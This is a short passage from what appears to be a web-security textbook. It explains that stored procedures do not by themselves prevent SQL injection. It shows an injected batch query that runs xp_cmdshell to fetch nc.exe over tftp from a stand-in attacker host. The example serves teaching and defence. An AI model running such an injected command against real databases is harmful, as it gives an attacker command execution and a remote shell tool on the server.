which causes the application to perform the following batch query:
exec sp_RegisterUser ‘joe’, ‘foo’; exec master..xp_cmdshell ‘tftp
wahh-attacker.com GET nc.exe’--‘
and so the use of the stored procedure has achieved nothing.
In fact, in a large and complex application that performs thousands of dif-
ferent SQL statements, many developers regard the solution of re-implement-
ing these statements as stored procedures to be an unjustifiable overhead on
development time.
Do'stlaringiz bilan baham: